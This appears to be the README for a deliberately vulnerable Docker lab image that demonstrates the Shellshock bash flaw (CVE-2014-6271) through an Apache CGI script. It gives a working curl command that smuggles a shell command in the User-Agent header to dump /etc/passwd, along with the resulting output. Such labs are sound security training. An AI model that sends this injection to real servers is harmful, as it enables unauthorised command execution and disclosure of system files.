Vulnerability as a Service - CVE 2014-6271

A Debian (Buster) Linux system with a vulnerable version of bash and a web application to showcase CVS-2014-6271, a.k.a. Shellshock.

Overview

This docker container is based on Debian Buster and has been modified to use a vulernable version of Bash (bash_4.2:2b:dfsg-0.1).

A web application is available via Apache 2 and serves a CGI script which runs shell commands.

Usage

Install the container with docker pull hmlio/vaas-cve-2014-6271

Run the container with a port mapping docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271

You should be able to access the web application at http://your-ip:8080/.

Exploitation

The web application/vulnerable bash version can be exploited as shown below:

# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

Credits

The concept and the web application are heavily inspired by the VulnHub VM "Sokar", created by rasta_mouse. For further details please see https://www.vulnhub.com/entry/sokar-1,113/.